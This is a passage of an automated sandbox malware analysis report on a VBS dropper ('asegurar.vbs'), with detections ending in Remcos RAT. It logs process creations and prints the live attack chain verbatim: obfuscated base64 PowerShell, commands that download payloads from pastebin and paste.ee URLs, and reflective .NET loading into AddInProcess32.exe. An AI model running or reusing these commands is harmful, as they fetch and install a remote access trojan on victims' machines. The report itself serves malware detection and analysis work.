?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /cJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat textJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $iujujjzz = 'wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?hi?dgbp?gm?zqbq?g8?aqbu?hq?tqbh?g4?yqbn?gu?cgbd?do?ogbt?gu?ywb1?hi?aqb0?hk?u?by?g8?d?bv?gm?bwbs?c??pq?g?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?v?b5?h??zqbd?do?ogbu?gw?cw?x?di?ow?k?em?qwbs?gg?bq?g?d0?i??n?gg?d?b0?h??cw?6?c8?lwbw?ge?cwb0?gu?ygbp?g4?lgbj?g8?bq?v?hi?yqb3?c8?sg?2?hu?ugbq?fo?cgb2?cc?i??7?cq?zg?g?d0?i??o?fs?uwb5?hm?d?bl?g0?lgbj?e8?lgbq?ge?d?bo?f0?og?6?ec?zqb0?fq?zqbt?h??u?bh?hq?a??o?ck?i??r?c??jwbk?gw?b??w?de?lgb0?hg?d??n?ck?i??7?ek?bgb2?g8?awbl?c0?vwbl?gi?ugbl?he?dqbl?hm?d??g?c0?vqbs?ek?i??k?em?qwbs?gg?bq?g?c0?twb1?hq?rgbp?gw?zq?g?cq?zg?g?c0?vqbz?gu?qgbh?hm?aqbj?f??yqby?hm?aqbu?gc?i??7?gm?bqbk?c4?zqb4?gu?i??v?gm?i??7?h??aqbu?gc?i??x?di?nw?u?d??lg?w?c4?mq?g?ds?c?bv?hc?zqby?hm?a?bl?gw?b??u?gu?e?bl?c??lqbj?g8?bqbt?ge?bgbk?c??ew?k?gy?i??9?c??k?bb?fm?eqbz?hq?zqbt?c4?sqbp?c4?u?bh?hq?a?bd?do?ogbh?gu?d?bu?gu?bqbw?f??yqb0?gg?k??p?c??kw?g?cc?z?bs?gw?m??x?c4?d?b4?hq?jw?p?c??ow?k?fe?u?b0?ge?dg?g?d0?i??o?c??rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??j?bm?c??kq?g?ds?sqbu?hy?bwbr?gu?lqbx?gu?ygbs?gu?cqb1?gu?cwb0?c??lqbv?fi?sq?g?cq?uqbq?hq?yqb2?c??lqbp?hu?d?bg?gk?b?bl?c??j?bm?c??lqbv?hm?zqbc?ge?cwbp?gm?u?bh?hi?cwbp?g4?zwb9?c??ow?k?fe?u?b0?ge?dg?g?d0?i??o?c??rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??j?bm?c??kq?g?ds?j?bq?gq?ygbm?gs?i??9?c??jw?w?cc?i??7?cq?zqb2?g8?bqbu?c??pq?g?cc?jqbk?gs?uqbh?hm?r?bm?gc?cgbu?gc?jq?n?c??owbb?ei?eqb0?gu?wwbd?f0?i??k?gq?d?b2?gu?yg?g?d0?i?bb?hm?eqbz?hq?zqbt?c4?qwbv?g4?dgbl?hi?d?bd?do?ogbg?hi?bwbt?ei?yqbz?gu?ng?0?fm?d?by?gk?bgbn?cg?i??k?fe?u?b0?ge?dg?u?hi?zqbw?gw?yqbj?gu?k??n?cq?j??n?cw?jwbb?cc?kq?g?ck?i??7?fs?uwb5?hm?d?bl?g0?lgbb?h??c?be?g8?bqbh?gk?bgbd?do?ogbd?hu?cgby?gu?bgb0?eq?bwbt?ge?aqbu?c4?t?bv?ge?z??o?cq?z?b0?hy?zqbi?ck?lgbh?gu?d?bu?hk?c?bl?cg?jwbu?gu?a?b1?gw?ywbo?gu?cwby?hg?w?b4?hg?lgbd?gw?yqbz?hm?mq?n?ck?lgbh?gu?d?bn?gu?d?bo?g8?z??o?cc?tqbz?he?qgbj?gi?wq?n?ck?lgbj?g4?dgbv?gs?zq?o?cq?bgb1?gw?b??s?c??wwbv?gi?agbl?gm?d?bb?f0?xq?g?cg?jw?w?c8?zg?y?gs?cgbs?c8?z??v?gu?zq?u?gu?d?bz?ge?c??v?c8?ogbz?h??d?b0?gg?jw?g?cw?i??k?gu?dgbv?g0?bg?g?cw?i??n?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xw?t?c0?lq?t?c0?lq?t?cc?l??g?cq?agbk?gi?zgbr?cw?i??n?de?jw?s?c??jwbs?g8?z?bh?cc?i??p?ck?ow?=';$yolopolhggobek = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $iujujjzz.replace('?','a') ) );$yolopolhggobek = $yolopolhggobek.replace('%jkqasdfgrtg%', 'c:\users\user\desktop\asegurar.vbs');powershell $yolopolhggobek;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$ccrhm = 'https://pastebin.com/raw/j6urjzrv' ;$f = ([system.io.path]::gettemppath() + 'dll01.txt') ;invoke-webrequest -uri $ccrhm -outfile $f -usebasicparsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([system.io.path]::gettemppath() + 'dll01.txt') ;$qptav = ( get-content -path $f ) ;invoke-webrequest -uri $qptav -outfile $f -usebasicparsing} ;$qptav = ( get-content -path $f ) ;$jdbfk = '0' ;$evomn = 'c:\users\user\desktop\asegurar.vbs' ;[byte[]] $dtveb = [system.convert]::frombase64string( $qptav.replace('$$','a') ) ;[system.appdomain]::currentdomain.load($dtveb).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ('0/f2krr/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'roda' ));"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand jabmacaapqagacgawwbtahkacwb0aguabqauaekatwauafaayqb0aggaxqa6adoarwblahqavablag0acabqageadaboacgakqagacsaiaanagqababsadaamqauahqaeab0accakqagadsajabrafaadabhahyaiaa9acaakaagaecazqb0ac0aqwbvag4adablag4adaagac0auabhahqaaaagacqazgagackaiaa7aekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbsaekaiaakafeauab0ageadgagac0atwb1ahqargbpagwazqagacqazgagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagca -inputformat xml -outputformat text
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $iujujjzz = 'wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?hi?dgbp?gm?zqbq?g8?aqbu?hq?tqbh?g4?yqbn?gu?cgbd?do?ogbt?gu?ywb1?hi?aqb0?hk?u?by?g8?d?bv?gm?bwbs?c??pq?g?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?v?b5?h??zqbd?do?ogbu?gw?cw?x?di?ow?k?em?qwbs?gg?bq?g?d0?i??n?gg?d?b0?h??cw?6?c8?lwbw?ge?cwb0?gu?ygbp?g4?lgbj?g8?bq?v?hi?yqb3?c8?sg?2?hu?ugbq?fo?cgb2?cc?i??7?cq?zg?g?d0?i??o?fs?uwb5?hm?d?bl?g0?lgbj?e8?lgbq?ge?d?bo?f0?og?6?ec?zqb0?fq?zqbt?h??u?bh?hq?a??o?ck?i??r?c??jwbk?gw?b??w?de?lgb0?hg?d??n?ck?i??7?ek?bgb2?g8?awbl?c0?vwbl?gi?ugbl?he?dqbl?hm?d??g?c0?vqbs?ek?i??k?em?qwbs?gg?bq?g?c0?twb1?hq?rgbp?gw?zq?g?cq?zg?g?c0?vqbz?gu?qgbh?hm?aqbj?f??yqby?hm?aqbu?gc?i??7?gm?bqbk?c4?zqb4?gu?i??v?gm?i??7?h??aqbu?gc?i??x?di?nw?u?d??lg?w?c4?mq?g?ds?c?bv?hc?zqby?hm?a?bl?gw?b??u?gu?e?bl?c??lqbj?g8?bqbt?ge?bgbk?c??ew?k?gy?i??9?c??k?bb?fm?eqbz?hq?zqbt?c4?sqbp?c4?u?bh?hq?a?bd?do?ogbh?gu?d?bu?gu?bqbw?f??yqb0?gg?k??p?c??kw?g?cc?z?bs?gw?m??x?c4?d?b4?hq?jw?p?c??ow?k?fe?u?b0?ge?dg?g?d0?i??o?c??rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??j?bm?c??kq?g?ds?sqbu?hy?bwbr?gu?lqbx?gu?ygbs?gu?cqb1?gu?cwb0?c??lqbv?fi?sq?g?cq?uqbq?hq?yqb2?c??lqbp?hu?d?bg?gk?b?bl?c??j?bm?c??lqbv?hm?zqbc?ge?cwbp?gm?u?bh?hi?cwbp?g4?zwb9?c??ow?k?fe?u?b0?ge?dg?g?d0?i??o?c??rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??j?bm?c??kq?g?ds?j?bq?gq?ygbm?gs?i??9?c??jw?w?cc?i??7?cq?zqb2?g8?bqbu?c??pq?g?cc?jqbk?gs?uqbh?hm?r?bm?gc?cgbu?gc?jq?n?c??owbb?ei?eqb0?gu?wwbd?f0?i??k?gq?d?b2?gu?yg?g?d0?i?bb?hm?eqbz?hq?zqbt?c4?qwbv?g4?dgbl?hi?d?bd?do?ogbg?hi?bwbt?ei?yqbz?gu?ng?0?fm?d?by?gk?bgbn?cg?i??k?fe?u?b0?ge?dg?u?hi?zqbw?gw?yqbj?gu?k??n?cq?j??n?cw?jwbb?cc?kq?g?ck?i??7?fs?uwb5?hm?d?bl?g0?lgbb?h??c?be?g8?bqbh?gk?bgbd?do?ogbd?hu?cgby?gu?bgb0?eq?bwbt?ge?aqbu?c4?t?bv?ge?z??o?cq?z?b0?hy?zqbi?ck?lgbh?gu?d?bu?hk?c?bl?cg?jwbu?gu?a?b1?gw?ywbo?gu?cwby?hg?w?b4?hg?lgbd?gw?yqbz?hm?mq?n?ck?lgbh?gu?d?bn?gu?d?bo?g8?z??o?cc?tqbz?he?qgbj?gi?wq?n?ck?lgbj?g4?dgbv?gs?zq?o?cq?bgb1?gw?b??s?c??wwbv?gi?agbl?gm?d?bb?f0?xq?g?cg?jw?w?c8?zg?y?gs?cgbs?c8?z??v?gu?zq?u?gu?d?bz?ge?c??v?c8?ogbz?h??d?b0?gg?jw?g?cw?i??k?gu?dgbv?g0?bg?g?cw?i??n?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xw?t?c0?lq?t?c0?lq?t?cc?l??g?cq?agbk?gi?zgbr?cw?i??n?de?jw?s?c??jwbs?g8?z?bh?cc?i??p?ck?ow?=';$yolopolhggobek = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $iujujjzz.replace('?','a') ) );$yolopolhggobek = $yolopolhggobek.replace('%jkqasdfgrtg%', 'c:\users\user\desktop\asegurar.vbs');powershell $yolopolhggobek;Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$ccrhm = 'https://pastebin.com/raw/j6urjzrv' ;$f = ([system.io.path]::gettemppath() + 'dll01.txt') ;invoke-webrequest -uri $ccrhm -outfile $f -usebasicparsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([system.io.path]::gettemppath() + 'dll01.txt') ;$qptav = ( get-content -path $f ) ;invoke-webrequest -uri $qptav -outfile $f -usebasicparsing} ;$qptav = ( get-content -path $f ) ;$jdbfk = '0' ;$evomn = 'c:\users\user\desktop\asegurar.vbs' ;[byte[]] $dtveb = [system.convert]::frombase64string( $qptav.replace('$$','a') ) ;[system.appdomain]::currentdomain.load($dtveb).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ('0/f2krr/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'roda' ));"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand jabmacaapqagacgawwbtahkacwb0aguabqauaekatwauafaayqb0aggaxqa6adoarwblahqavablag0acabqageadaboacgakqagacsaiaanagqababsadaamqauahqaeab0accakqagadsajabrafaadabhahyaiaa9acaakaagaecazqb0ac0aqwbvag4adablag4adaagac0auabhahqaaaagacqazgagackaiaa7aekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbsaekaiaakafeauab0ageadgagac0atwb1ahqargbpagwazqagacqazgagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagca -inputformat xml -outputformat textJump to behavior
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerJ0\001
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerJ0\001Op
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerJ0\GB
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerJ0\
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerns.org:20014p
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managers|
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerJ0\001?ptK
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerJ0\8
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: AddInProcess32.exe, 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, logs.dat.8.drBinary or memory string: [Program Manager]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00434CB6 cpuid 8_2_00434CB6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoA,8_2_0040F90C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,8_2_0045201B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,8_2_004520B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_00452143
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,8_2_00452393
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,8_2_00448484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_004524BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,8_2_004525C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00452690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,8_2_0044896D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_00451D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,8_2_00451FD0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00404F51 GetLocalTime,CreateEventA,CreateThread,8_2_00404F51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041B69E GetComputerNameExW,GetUserNameW,8_2_0041B69E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0044942D _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,8_2_0044942D
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.2961914920.0000000002C1E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
